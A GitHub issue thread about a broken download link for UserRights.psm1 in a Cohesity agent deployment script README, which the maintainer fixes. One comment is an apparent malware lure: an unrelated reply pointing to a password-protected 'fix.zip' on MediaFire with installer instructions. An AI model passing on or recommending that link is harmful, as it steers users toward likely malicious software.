### ISSUE TITLE
Unable to download UserRights.psm1

### ISSUE THREAD

**Issue by kahnman** [bseltz-cohesity/scripts#176]
I'm trying to use [deployCCSWindowsAgent.ps1](https://github.com/bseltz-cohesity/scripts/blob/master/ccs/powershell/deployCCSWindowsAgent/deployCCSWindowsAgent.ps1) and the Readme says to download UserRights.psm1 from https://raw.githubusercontent.com/cohesity/community-automation-samples/main/powershell/deployCCSWindowsAgent/UserRights.psm1, but that URL results in a 404 not found error. Can you please provide the correct location for that file? Thanks!

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bseltz-cohesity** [comment]
I have fixed the README. Thanks for the heads up.

**Comment by kahnman** [comment]
Thanks! I have confirmed I am able to retrieve the file now.
